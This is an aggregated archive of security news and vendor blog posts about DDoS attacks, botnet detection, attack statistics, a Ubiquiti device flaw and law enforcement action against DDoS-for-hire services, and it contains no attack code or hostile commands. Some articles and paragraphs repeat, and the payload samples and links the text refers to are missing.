Category Archives: DDoS

Hacker arrested for wave of fake bomb and shooting threats against schools

Hacker arrested for wave of fake bomb and shooting threats against schools

FBI agents have arrested a 20-year-old man alleged to have been part of a hacking gang which not only launched distributed denial-of-service (DDoS) attacks, but also launched a wave of chilling bomb and shooting threats against thousands of schools in the United States and United Kingdom.

Read more in my article on the Tripwire State of Security blog.

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter


A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example – a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources – an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files  on more than 50 different customers with a cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.

The post How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications appeared first on Blog.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

ThreatList: Latest DDoS Trends by the Numbers

Trends in DDoS attacks show a evolution beyond Mirai code and point to next-gen botnets that are better hidden and have a greater level of persistence on devices – making them "far more dangerous."

Historical OSINT – “I Know Who DDoS-ed Georgia and Last Summer”

Appreciate my rhetoric. In this post I'll provide actionable intelligence on a key DDoS for hire service that was primarily used in the Russia vs Georgia Cyber Attacks circa 2009 including the DDoS attack against Related actionable intelligence on the campaign: hxxp:// - Email: - - hxxp:// - hxxp:// The last one

Historical OSINT – A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Campaign – 2010

Remember the massive Russia vs Georgia cyber attack circa 2009? It seems that the time has come for me to dig a little bit deeper and provide actionable intelligence on one of the actors that seem to have participated in the campaign including a sample Pro-Georgian type of Cyber Militia that apparently attempted to "risk-forward" the responsibility for waging Cyberwar to third-parties including

A Shift From Quantity To Quality: 2018 Saw Cybercriminals Dropping Basic DDoS Operations.

The Kaspersky Lab DDoS Q4 Report covering statistics of the last quarter and the whole of 2018 highlights a 13% decline in the overall number of DDoS attacks when compared with the statistics from the previous year. However, the duration of mixed and HTTP flood attacks is growing, which suggests that malefactors are turning to more sophisticated DDoS attack techniques.

The low cost of DDoS-as-hire makes such attacks one of the most affordable cyberweapons for evil competitors or internet trolls. Businesses, regardless of their size or industry, can face this threat and suffer revenue and reputation losses in case legitimate users and customers cannot access company’s web resources. Despite the number of DDoS attacks falling in 2018, it’s too early to rejoice as the decrease of the amount of attacks does not mean a decrease in their severity. According to Kaspersky Lab researchers, as more and more organisations adopt solutions to protect themselves from simple types of DDoS attacks, 2019 will likely see attackers improve their expertise to overcome standard DDoS protection measures and bring overall complexity of this type of threat to the next level.

Although the number of attacks is decreasing, analysis from Kaspersky Lab experts has found that the average attack duration is growing. Compared with the beginning of the year, the average length of attacks has more than doubled – from 95 minutes in Q1 to 218 minutes in Q4. It is notable that UDP flood attacks (when the attacker sends a large number of UDP packets to the target’s server ports in order to overwhelm it and make it unresponsive for clients), which are accounting for almost half (49%) of the DDoS attacks in 2018, were very short and rarely lasted more than 5 minutes.

Kaspersky Lab experts assume that the decline in the duration of UDP flood attacks illustrates that the market for easier to organise attacks is shrinking. Protection from DDoS attacks of this type is becoming widely implemented, making them ineffective in most cases. The researchers propose that attackers launched numerous UDP flood attacks to test whether a targeted resource is not protected. If it immediately becomes clear that attempts are not successful, malefactors stop the attack.

At the same time, more complex attacks (such as HTTP misuse) which require time and money, will remain long. As the report revealed, HTTP flood method and mixed attacks with HTTP component, which shares were relatively small (17% and 14%), constitute about 80% of DDoS attack time of the whole year.

“Most simple DDoS attacks don’t achieve their aim. Because of this, cybercriminals aiming to benefit financially from these attacks only have two options. The first option is that they could divert the resources required for DDoS attacks towards other sources of revenue, such as cryptomining. Their second option is to improve their technical skills. Given this, we can anticipate that DDoS attacks will evolve in 2019 and it will become harder for companies to detect them and stay protected,” – comments David Emm, Principal Security Researcher at Kaspersky Lab.

Regarding results from the last quarter, the longest DDoS attack in Q4 lasted 329 hours (almost 14 days) – such a long attack was last registered at the end of 2015.

The top three counties which had the most conducted DDoS attack remain the same. China is again in first place but its share dropped significantly from 77.67% to 50.43%. The US remains second and third place is still occupied by Australia.

By target distribution, China still tops the list, but its share declined to 43.26% (70.58% in Q3).

In Q4, there have also been changes in the countries hosting the most C&C servers. As in the previous quarter, the US remained the leader, but the UK and the Netherlands came second and third, replacing Russia and Greece respectively. This is likely because of the number of active C&C Mirai servers increasing significantly in the aforementioned countries.

Kaspersky Lab recommends the following steps to protect an organisation from DDOS attacks:

· Train personnel to respond to such incidents in a proper way;

· Ensure that a company’s websites and web applications can handle high traffic;

· Use professional solutions to protect against attacks. For example, Kaspersky DDoS Protection combines Kaspersky Lab’s extensive expertise in combating cyberthreats and the company’s unique in-house developments. The solution protects against all types of DDoS attacks regardless of their complexity, strength or duration.

About Kaspersky Lab

Kaspersky Lab is a global cybersecurity company, which has been operating in the market for over 20 years. Kaspersky Lab’s deep threat intelligence and security expertise is constantly transforming into next generation security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky Lab technologies and we help 270,000 corporate clients protect what matters most to them. Learn more at

The post A Shift From Quantity To Quality: 2018 Saw Cybercriminals Dropping Basic DDoS Operations. appeared first on IT Security Guru.

Security Affairs: Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquity devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquity users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquity installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquity communities, in June the issue was discussed in a thread on the Ubiquity forums where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they were monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquity is aware of the issue and is currently working on a firmware update that will address it anyway it is trying to downplay it.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquity.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Waiting for a fix, Ubiquity recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using the Rapid7’s Sonar project, experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquity devices are located in Brazil, followed by the United States, and Spain.

ubiquity vulnerable

“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly.” continues Rapid7. For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”


The analysis of the names of the device revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that they have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.

Security Affairs

Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquity devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquity users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquity installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquity communities, in June the issue was discussed in a thread on the Ubiquity forums where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they were monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquity is aware of the issue and is currently working on a firmware update that will address it anyway it is trying to downplay it.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquity.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Waiting for a fix, Ubiquity recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using the Rapid7’s Sonar project, experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquity devices are located in Brazil, followed by the United States, and Spain.

ubiquity vulnerable

“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly.” continues Rapid7. For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”


The analysis of the names of the device revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that they have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.

The Challenges of DIY Botnet Detection – and How to Overcome Them

Network of platforms with bots on top botnet cybersecurity concept 3D illustration

Botnets have been around for over two decades, and with the rise of the Internet of Things (IoT) they have spread further to devices no one imagined they would – printers, webcams, and even toasters and fridges.

Some botnets enlist infected devices to mine cryptocurrency or steal passwords from other devices. But others are, in fact, legions of bot-soldiers waiting for a command to attack a target server. Here at Imperva, we detect botnets and prevent them from harming our customers. Botnet detection isn’t an easy task. In this post I’ll attempt to describe the pitfalls in botnet detection.

Detecting a Botnet

So what’s a botnet? Simply put, it’s a cluster of bots – compromised computers and devices – that perform commands given by the botnet owner. Usually, the botnet owner will dedicate one compromised device as the Command and Control (CnC) server for communication with his bots. Thus, the best way to discover a botnet is by finding its CnC, but that’s usually not a simple task. Let me explain why.

How can we Detect a Botnet

The smoking gun that points to a botnet is its CNC. Obviously, here at Imperva we don’t protect CnCs or bots – we protect against attacks originating from them. We are successful enough that it’s very unlikely any bot or CnC will be able to operate behind our service. Practically speaking, our best option to detect botnets is to examine their attacks on sites we protect.

When looking at exploit attempts, there are a few possible indicators of a botnet. For example, if the same IPs attack the same sites at the same time using the same payloads and attack pattern, there’s a good chance they’re part of the same botnet. This is especially true if many IPs and sites are involved. One common example is a DDoS attempt by a botnet on a web service.

A botnet attempting to DDoS a few sites: as the owner of the sites, during the attack you’ll see a large group of IPs sending many requests to the login page and the shopping cart page.

Reasons for False Positives

Even though I might have made detecting botnets sound quite simple, it really isn’t. Some payloads are so widely used that it’s difficult to distinguish between a truly-concerted botnet attack and a random one-off attack. Attackers can change their IPs by using a VPN or a proxy, making it look like many attackers are involved. Some proxy services even allow a single user to utilize many different IPs.

Hacking Tools can be Deceiving

Hacking tools and vulnerability scanners are similar to botnets as well. These tools generate the same payloads and attack patterns, and many hackers use them, regardless of the color of their hat. While it is an unlikely scenario, if different players conduct a Penetration Test on the same site at the same time, it’ll look like a coordinated botnet attack.

How can we Differentiate?

There are many ways to identify clients, but in this case simply looking at the raw request will do the trick. Luckily for us, because vulnerability scanners are so popular, it is easy to find out if they’re to blame. Sometimes, the user agent header will reveal the name of the tool. In other cases, Googling the payload will lead you straight to the tool.

Bot(net) Or Not?

Grab ‘em by the Payload

To discover botnets, we decided to use two different approaches. The first approach uses a naive back-and-forth algorithm to find botnets.

Any website owner can analyze data from their weblogs and use this technique.

You might want to improve this algorithm, and you can do so in several ways. You can separate the request to parameters and then search for a popular parameter value. Try using Levenshtein Distance, or any other distance algorithms, to find similar payloads. For this research, we decided to simply separate requests into query strings and post bodies.

Any website owner can analyze data from their weblogs and use this technique.

You might want to improve this algorithm, and you can do so in several ways. You can separate the request to parameters and then search for a popular parameter value. Try using Levenshtein Distance, or any other distance algorithms, to find similar payloads. For this research, we decided to simply separate requests into query strings and post bodies.

The following charts plot the daily activity of IP addresses involved in an attack on our websites during a given timeframe. In red, you can see the percentage (left axis) of IPs that participated in an attack on any given day, which is calculated by taking the number of attacking IPs that day and dividing by the highest number of attacking IPs on ANY day during our time frame.

Similarly, the blue line represents the percentage (left axis) of attacked sites on any day, calculated by dividing the number of protected sites attacked that day by the highest number of protected sites attacked during this timeframe. The yellow bars represent the median (right axis) number of days all of the attacking IPs on that day have attacked overall during the studied timeframe. For instance, if 30 IPs attacked on one day and the median number shown is 10, that means 15 IPs have attacked more than 10 days, and 15 IPs have attacked fewer than 10 days.

Attack #1

A Backdoor Uploader. Nearly 1,000 IPs attempted to upload a backdoor to over 1,000 sites. The payload coming from the different IPs was exactly the same, but that’s not the best part. It appears that the payload is a variation of the infamous CKnife webshell. Combined with the low IP turnover rate (i.e. the same IPs are attacking half of the time, as shown by the high median yellow bars), chances are that this is a botnet.

Attack #2

Nearly 4,000 IPs used a payload meant to test for a SQL Injection vulnerability. A search for that payload revealed that the SQLI Dumper tool is behind the attack. Looking at other attacks performed by these IPs revealed attempts at Remote Code Execution (RCE), backdoor upload and other attacks that aren’t in the SQLI Dumper playbook. Also, while the number of attacking IPs grows – the median number of days attacked by the attacking IPs shrinks. Testing for correlation between them revealed a strong negative correlation (-0.84). Combining this data with the medium IP turnover rates (shown by the yellow bars) indicates that this attack is comprised of a few core bots and many temporary IPs. We tested this hypothesis and found that ~50 IPs were involved during the entire attack. This might mean that several different groups are using the same payload, and this is not a single botnet.

Attack #3

A tool that looks like a botnet, but it’s not. Let me explain why. Although nearly 2,000 IPs were involved, it’s easy to see that the median number of days they attacked is pretty low. This means that in most cases hackers used these IPs to attack for a few days, and then stopped using them completely. This pattern isn’t typical of botnets because botnet owners will usually reuse the IPs in their disposal. Googling the payload revealed that a popular hacking tool named AutoexploiterBot is behind this attack. Likely, multiple users used it to attack us which explains why it wasn’t the same attacking IPs.

The payload sent during the attack:

The base64 in the exploit than decodes to a mid-stage code, which decodes to a webshell with a visible link to the tool:

Bringing out the Big Guns

The second algorithm we used for botnet detection has a more sophisticated approach. We utilized our specialized Client Classification abilities to cluster clients that carried out many coordinated attacks.

Out of the hundreds of results we got, we focused on the most interesting ones:

Attack #4

Backdoor Uploader revisited. This is the same backdoor uploader we found using the first approach. This time we caught more of its core IPs as indicated by the low turnover rate (i.e. the high yellow median bars). It’s interesting we found this botnet using both approaches, even though they are inherently different.

Attack #5

Probably the most distinguishable of them all. This botnet has a handful of malicious Remote Code Execution (RCE) payloads. Each RCE embeds the same unique site address somewhere within the victim’s server. Furthermore, its IPs almost never change, as indicated by the very high yellow bars. To recap – we have the same few payloads, advertising the same site, coming from the same IPs. Thus strongly indicating this is a botnet.

Attack #6

A botnet blogpost isn’t complete without a Spambot. This one is aiming at the comment section of a web site, trying to add comments advertising a Chinese gambling site. What’s fascinating is that it allows us to glimpse multiple cycles of spam campaigns. In each cycle, a varying number of IPs attack for a short while and then stop. A possible explanation would be that this Spambot is for hire, and each cycle is a paid spam campaign.


Botnets can be a tricky thing to detect and mitigate, but even analyzing the simplest weblog entries can supply valuable insight, especially against continuous campaigns. All of the botnets we found can cause real damage to your site and customers. Some will take over your site and others will expose private information.

Once you find an IP that belongs to a botnet, you can block it and use it to discover more IPs that are part of the botnet. Some of the payloads we found in this research were a few years old, or new variants of old exploits. So digging into your log history might give you insight to protect your site the next time a botnet comes around.

The post The Challenges of DIY Botnet Detection – and How to Overcome Them appeared first on Blog.

Security Affairs: Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever

Imperva mitigated a SYN flood DDoS attack against one of its clients that exceeded 500 million packets per second, this is the largest ever.

Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.

Imperva DDoS attack

The attacker sent both a flood of normal SYN packets and a large SYN flood
using two previously known tools.

The attacker used highly randomized and likely spoofed set of source ports and addresses to send packets of between 800 and 900 bytes.

Normal SYN packets allow to saturate the target resources, while larger packets saturate the network.

According to the experts, the two tools used in the attack were developed by two different individuals, and the attacker combined them in the January attack.

“When we investigated, we realized the attack wasn’t generated using new tools, but two common older ones: one for the syn attack and the other for the large syn attack. Although both tools try to mimic legitimate operating systems, there are some odd, suspicion-raising differences.” reads the report published by Imperva.

“One possible hypothesis is that these tools, although used in the same attack, were written by two different individuals and then combined to form an arsenal and launch the most intensive DDoS attack against Network infrastructure in the history of the Internet. “

Experts pointed out that the most important factor to evaluate the magnitude of a DDoS attack are the Packets per second (PPS).M

The mitigation of DDoS attacks involving very high PPS is very hard because of the computer processing power required to evaluate every single packet.

Network appliances mostly evaluate the headers of every packet and only in a limited number of case they inspect the full payload. Their limiting factor is the packet rate, not the packet size.

Since today, the 2018 GitHub DDoS attack that peaked 1.35 Tbs is considered the largest-ever distributed denial of service. or instance. Its traffic was mainly composed of large packets sent from the same port from different servers at a relatively low PPS rate of around 129.6 million.

The attack observed by Imperva this month was nearly four times in terms of the number of packets being sent from random sources.

The good news is that high PPS attacks are difficult to generate because they require more computational resources.

Pierluigi Paganini

(SecurityAffairs – DDoS, hacking)

The post Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever appeared first on Security Affairs.

Security Affairs

Meet the New Imperva – Defending Your Business Growth Today and Tomorrow


Today’s Imperva is a champion in the fight to secure data and applications, wherever they reside. The threat landscape is dangerous and ever-changing, but our thousands of customers know they can count on Imperva to protect them. No wonder our solutions are recognized as leaders by analysts such as Gartner and Forrester Research.  

However, security is changing. It’s no longer just about protecting your company’s digital assets. It’s also about protecting your employees, partners, customers, and all of their applications, data, API’s, microservices, and even IoT devices. Millions of interactions occur every day that drive business value – and revenue.

Within this vast new universe, traditional lockdown security approaches just don’t cut it anymore. They’re too rigid, create their own security gaps, and stifle your business. What you need is a security posture that assumes an open exchange between data, applications and users. To do that successfully, you need greater visibility into all your digital systems, whether on-premises or in the cloud, so you can quickly pinpoint the threats that matter. You also need agility to adapt to fast-changing DevOps environments. And you need resilient systems that not only prevent data breaches and DDoS attacks but can also recover quickly, too.

In short, your business’s security needs are evolving. Which is why Imperva is also evolving, in order to remain the defender of your business growth, so you never have to choose between innovating for your customers and protecting what matters.

This year, we’ll be launching major expansions to our data and application security solutions. We’re also boosting the visibility delivered by them, distilling millions of data points so that you have actionable insights and the ability to automate the responses that protect your business.

To make it easier for you to focus on your business, we’re also simplifying how we bring our products to market, from the naming, to the packaging, to the pricing. Through a subscription model we call FlexProtect, enterprises can deploy Imperva solutions how and when you need them, in order to quickly gain the protection you need.

This year, Imperva will also be introducing useful new research and thought leadership to help your organization get smarter and respond to threats faster. Additionally, we are committed to making your experience with our brand and products even better. We are introducing an all-new look and feel, which you can check out today starting with our website, the new!

Doing business today has never been more potentially rewarding – or challenging. Security providers need to be up to the task. That’s why Imperva is evolving. We do more than simply guard your data and apps. We’ll help you anticipate real threats, minimize the business impact of any incidents, and build customer trust – all without overstretching limited resources. As your own business evolves, so does Imperva, so we can remain your defender and help you realize your growth ambitions, today and tomorrow.


Protect the pulse of your business.

The post Meet the New Imperva – Defending Your Business Growth Today and Tomorrow appeared first on Blog.

Law enforcement worldwide hunting users of DDoS-for-Hire services

Europol and law enforcement agencies worldwide are investigating DDoS-for-hire services and hunting users that paid them to carry out cyber attacks.

In April 2018, an international operation conducted by the European law enforcement agencies led by the UK’s National Crime Agency (NCA) and the Dutch Police, with the help of Europol, took down the world’s biggest DDoS-for-hire service.

The operation dubbed Power Off allowed to shut down the biggest DDoS-for-hire service  ( and arrest its administrators. According to the investigators, the platform was involved in over 4 million attacks and arrested its administrators.

DDoS-for-hire service 3

The police arrested 6 members of the crime group behind the ‘ website in Scotland, Croatia, Canada, and Serbia on Tuesday.

The Europol confirmed that had 136,000 registered users and was used to target online services from banks, government institutions, police forces and the gaming

Now law enforcement agencies are now investigating on customers that paid for the DDoS-for-hire-service service.

Europol has announced that the British NCA is conducting several operations all over the world to identify and arrest users.

“In the United Kingdom a number of users have recently been visited by the police, who have seized over 60 personal electronic devices from them for analysis as part of Operation Power OFF.” reads the press release published by the Europol. “UK police are also conducting a number of live operations against other DDoS criminals; over 250 users of and other DDoS services will soon face action for the damage they have caused.”

The Europol gained access to the accounts of over 151,000 registered Webstresser users when it dismantled the service, the agency also obtained a huge trove of information about them.

According to the Europol, over 250 users of DDoS-for-hire services <, including Webstresser will soon face potential prosecution.

“To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser. Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users.” continues the press release.

Size does not matter – all levels of users are under the radar of law enforcement, be it a gamer booting out the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain. “

UK police already raided the homes of several users, in Netherlands authorities are working to unmask Dutch users of the service. A Dutch user of has already received this alternative sanction.

Europol revealed that other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks.

“Emboldened by a perceived anonymity, many young IT enthusiasts get involved in this seemingly low-level crime, unaware of the consequences that such online activities can carry. Cybercrime isn’t a victimless crime and it is taken extremely seriously by law enforcement. The side effects a criminal investigation could have on the lives of these teenagers can be serious, going as far as a prison sentence in some countries.” concludes the Europol.

“Skills in coding, gaming, computer programming, cyber security or anything IT-related are in high demand and there are many careers and opportunities available to use these wisely.”

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – DDoS-for-hire service, hacking)

The post Law enforcement worldwide hunting users of DDoS-for-Hire services appeared first on Security Affairs.

Why You Need to Block the Threat Factory. Not Just the Threats.


Cyber criminals will create roughly 100 million new malware variants over the next 12 months. Security vendors will respond with new malware signatures and behaviors to stop them, but thousands of companies will be victimized in the process, experiencing costly or catastrophic breaches. This isn’t new - it’s a cycle.

SSDP amplification attacks rose 639%

The Nexusguard Q3 2018 Threat Report has revealed the emergence of an extremely stealthy DDoS attack pattern targeting communications service providers (CSPs). Comparison between normal attack traffic and attack traffic with legitimate traffic This new vector exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny attack traffic across hundreds of IP addresses to evade detection. The ongoing evolution of DDoS methods suggests that CSPs need to enhance their network security … More

The post SSDP amplification attacks rose 639% appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibit similar behavior among the various attacks conducted by the same gang. IP Gang attack-type classification against attack volume size Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, … More

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

Smashing Security #111: When rivals hack, and ‘extreme’ baby monitors

Smashing Security #111: When rivals hack, and 'extreme' baby monitors

Why a business spat resulted in Liberia falling off the internet, how the US Government shutdown is impacting website security, and the perplexing world of extreme IoT devices.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Zoë Rose.

Imperva Increases Self-Service Capability Fourfold with Custom Security Rules

Back in 2014, we introduced Rules (previously IncapRules) to give our customers advanced control over their application security.

Today we’re putting even more of this custom tuning power in the hands of our customers by quadrupling the number of filters available via self-service.

Rules Basics

Rules are an extensive policy engine developed in response to the emergence of increasingly advanced threats as well as the growing demand to add more logic at the edge. Advanced threats continue to drive the need for adaptive security solutions which enable real-time response and flexible, custom security policy enforcement.

Rules are built using filters, operators, and values. Filters are the core function which helps tune manual policies. Customers use filters for advanced bot protection, security against brute-force attacks, and more. Although about 90% of our customers use our out-of-the-box policies in their default preventative settings, leaving the burden of tuning to the Imperva security experts, there are times when some of our customers need to make specific adjustments to their security policies.

The Existing Filter Set

Traditionally, Imperva has limited to 20 the list of filters exposed to our customers. A set of parameters is available for self-service use when defining Rules.

Filters for Rules are divided into three logical groups:

  1. Clients: Information about the connecting client
  2. Requests: Information about the current request
  3. Counters\rates: A running count of the number of actions performed  

As one example, there’s an existing filter for the ID for the client application.

  • Googlebot (Search bot) (6)
  • cURL (Developer Tool) (47)

When adding or editing a rule in the Management Console, you start entering text in the value field to display a list of available values.

Example: ClientId == 15

The New Filters

Behind the scenes, the Imperva Support team and SOC alone have had much more power up until now in terms of custom tuning upon request, with access to approximately 100 different filters.

But by expanding the set of Rules available via self-service to a total of 48 filters, even more policy customization is possible without ever needing to contact the Support team.  

To complement existing self-service Rules for bot protection, protection against Account Takeover (ATO), application hardening, rate limiting, and Advanced Access Control (ACL), the new filters offer the following and more:

  • Advanced optionality when handling advanced bot scenarios
  • Logic based on popular technologies such as Drupal, PHP, Joomla, WordPress and others
    (the idea here is to simplify complex expressions by encapsulating the tech detection and rates within a single command)
  • Client certificate info such as CN, SHA1 and Serial Number


Here are three examples of new filters unveiled to customers:

(1) session-creation-ip_rate

If you set the value here to, say, 800, you will be able to capture sessions with more than 800 requests from a certain IP in 1 minute – a likely indicator of a DDoS attack.

(2) request-rate-ip_rate

This filter measures the rate of requests per IP over a 1-minute period, and if you expect no more than 100 requests, you can set the action to “block” or “alert” because that could indicate that an attacker is trying to scrape your website.

(3) login-bf-drupal_rate

